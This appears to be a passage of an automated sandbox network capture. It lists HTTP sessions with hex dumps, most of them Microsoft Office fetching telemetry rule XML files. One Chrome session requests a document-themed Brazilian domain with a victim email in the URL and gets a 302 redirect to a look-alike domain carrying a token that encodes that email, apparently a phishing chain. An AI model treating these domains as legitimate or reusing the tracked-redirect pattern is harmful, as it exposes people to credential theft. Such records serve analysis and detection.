                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:44 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C8E04C8"
                                                  x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170945Z-174f7845968jrjrxhC1EWRmmrs0000000xcg000000009353
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  28192.168.2.64974013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:44 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DACDF62"
                                                  x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170945Z-174f78459688l8rvhC1EWRtzr000000009wg000000004sw9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  29192.168.2.64974113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:45 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                  ETag: "0x8DC582B9E8EE0F3"
                                                  x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170945Z-174f7845968l4kp6hC1EWRe8840000000xdg00000000kn3c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:45 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  30192.168.2.64974313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:45 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 428
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC4F34CA"
                                                  x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170945Z-174f78459685m244hC1EWRgp2c0000000x30000000008nx6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:45 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  31192.168.2.64974713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5815C4C"
                                                  x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170947Z-174f7845968jrjrxhC1EWRmmrs0000000xf0000000001fu3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  32192.168.2.64974613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B988EBD12"
                                                  x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170947Z-174f7845968ljs8phC1EWRe6en0000000wyg00000000ukk7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  33192.168.2.64974513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 499
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                  ETag: "0x8DC582B98CEC9F6"
                                                  x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170947Z-174f78459688l8rvhC1EWRtzr000000009x0000000002sn4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:47 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  34192.168.2.64974813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB32BB5CB"
                                                  x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170947Z-174f7845968pf68xhC1EWRr4h80000000xd000000000mh4y
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.64974913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8972972"
                                                  x-ms-request-id: a230c581-101e-0034-3128-4096ff000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170947Z-174f7845968pf68xhC1EWRr4h80000000xc000000000qd4f
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:47 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.64975194.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:47 UTC752OUTGET /?jjzzxogc&email=u9s7oo@vlxwrxa.org HTTP/1.1
                                                  Host: documerge.arroiodosilva.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Referer: https://adrianocarreira.com/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:48 UTC612INHTTP/1.1 302 Found
                                                  Set-Cookie: qPdM=kuJFyCv2yktT; path=/; samesite=none; secure; httponly
                                                  Set-Cookie: qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; path=/; samesite=none; secure; httponly
                                                  location: https://documerger.afua.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvY3VtZXJnZXIuYWZ1YS5jb20uYnIvIiwiZG9tYWluIjoiZG9jdW1lcmdlci5hZnVhLmNvbS5iciIsImtleSI6Imt1SkZ5Q3YyeWt0VCIsInFyYyI6InU5czdvb0B2bHh3cnhhLm9yZyIsImlhdCI6MTczMjcyNzM4OCwiZXhwIjoxNzMyNzI3NTA4fQ.3Glfdu1-h4hcJLG6frjQG7LUrGE0ClWKXeH5CYKR-jk
                                                  Date: Wed, 27 Nov 2024 17:09:48 GMT
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2024-11-27 17:09:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.64975213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:49 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:49 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 420
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DAE3EC0"
                                                  x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170949Z-174f7845968n2hr8hC1EWR9cag0000000wv000000000gm92
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:49 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.64975313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:49 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:49 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                  ETag: "0x8DC582B9D43097E"
                                                  x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                  x-ms-version: 2018-03-28
